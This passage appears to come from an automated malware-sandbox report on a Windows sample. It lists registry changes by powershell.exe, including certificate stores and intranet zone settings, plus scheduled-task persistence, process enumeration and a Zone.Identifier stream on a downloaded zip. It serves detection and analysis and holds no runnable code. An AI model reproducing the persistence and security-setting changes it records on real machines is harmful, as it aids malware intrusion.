\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 21 Jul 2024 21:29:05 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs lsass.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Modifies registry class 64 IoCs
Processes:
Explorer.EXERuntimeBroker.exefirefox.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9069842-eaff-43e5-a = f914350eb5dbda01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\924fadd4-62e0-4475-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69f29199-6ad2-4abe-a RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3552767-a14c-4f3b-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f7b595e-2465-4872-9 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5dfa81d3-5307-4a2f-8 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69f29199-6ad2-4abe-a = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97169a09-2860-4d30-9 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" msedge.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f7b595e-2465-4872-9 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a078b7be-3457-4687-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\924fadd4-62e0-4475-b = "8324" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000b89a61c808d2da01c1b2ed62b5dbda01c1b2ed62b5dbda0114000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59d26c16-cbbd-4e69-a RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a078b7be-3457-4687-b = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001907c30db5dbda010386860eb5dbda010386860eb5dbda014e6b09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000f558abab2000353466393238636130393534303363323430353864313262653337363032616162643236626535383465643163366632666538316638393338666337393661320000b20009000400efbef558ababf558abab2e0000000000000000000000000000000000000000000000000023841800350034006600390032003800630061003000390035003400300033006300320034003000350038006400310032006200650033003700360030003200610061006200640032003600620065003500380034006500640031006300360066003200660065003800310066003800390033003800660063003700390036006100320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000079157e6b1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35346639323863613039353430336332343035386431326265333736303261616264323662653538346564316336663266653831663839333866633739366132000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006d75656f61777862000000000000000042a588cce54ed54782435438d987b62774d62828063eef1196f8ee1473af069642a588cce54ed54782435438d987b62774d62828063eef1196f8ee1473af0696ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700300031003500380033003100310034002d0032003600330036003600300031003000350033002d003900340037003400300035003400350030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000075020305000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a61b3e93-cfc1-4747-9 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\69f29199-6ad2-4abe-a RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 4e00310000000000f55884ab100054656d7000003a0009000400efbee9587170f55884ab2e000000a2e10100000001000000000000000000000000000000bd5aae00540065006d007000000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\924fadd4-62e0-4475-b = 4d373a0db5dbda01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b3552767-a14c-4f3b-b RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5dfa81d3-5307-4a2f-8 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f7b595e-2465-4872-9 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000cb7d9a0db5dbda01c2db180eb5dbda01c2db180eb5dbda01e3fd0b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000f558abab2000356630343066643763616465343732363963613235333863303335336562333032363132333936646661353065343165663432653538313832656639643433380000b20009000400efbef558ababf558abab2e0000000000000000000000000000000000000000000000000068e63900350066003000340030006600640037006300610064006500340037003200360039006300610032003500330038006300300033003500330065006200330030003200360031003200330039003600640066006100350030006500340031006500660034003200650035003800310038003200650066003900640034003300380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000079157e6b1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35663034306664376361646534373236396361323533386330333533656233303236313233393664666135306534316566343265353831383265663964343338000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006d75656f61777862000000000000000042a588cce54ed54782435438d987b62771d62828063eef1196f8ee1473af069642a588cce54ed54782435438d987b62771d62828063eef1196f8ee1473af0696ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700300031003500380033003100310034002d0032003600330036003600300031003000350033002d003900340037003400300035003400350030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000075020305000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\924fadd4-62e0-4475-b = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\97169a09-2860-4d30-9 = "\\\\?\\Volume{05030275-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\0cd2cd8b3d0c11b733f52fd1ab923838c4c2adc4071872ee18b12acdeaae2347" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9069842-eaff-43e5-a = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f7b595e-2465-4872-9 = 5aa7530eb5dbda01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59d26c16-cbbd-4e69-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Explorer.EXE -
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Temp.zip:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1788 schtasks.exe 9552 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3448 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemain.exepowershell.exepowershell.exepowershell.exepid process 3252 powershell.exe 3252 powershell.exe 2672 powershell.exe 2672 powershell.exe 3252 powershell.exe 3252 powershell.exe 4396 powershell.exe 4396 powershell.exe 2672 powershell.exe 2672 powershell.exe 1868 powershell.exe 1868 powershell.exe 1828 powershell.exe 1828 powershell.exe 2224 powershell.exe 2224 powershell.exe 1828 powershell.exe 1828 powershell.exe 1868 powershell.exe 4396 powershell.exe 4396 powershell.exe 1868 powershell.exe 2224 powershell.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 2500 main.exe 9468 powershell.exe 9468 powershell.exe 9468 powershell.exe 9936 powershell.exe 9936 powershell.exe 9936 powershell.exe 5864 powershell.exe 5864 powershell.exe 5864 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
Explorer.EXEtaskhostw.exeUpdate.exefirefox.exepid process 3448 Explorer.EXE 2396 taskhostw.exe 8444 Update.exe 6776 firefox.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
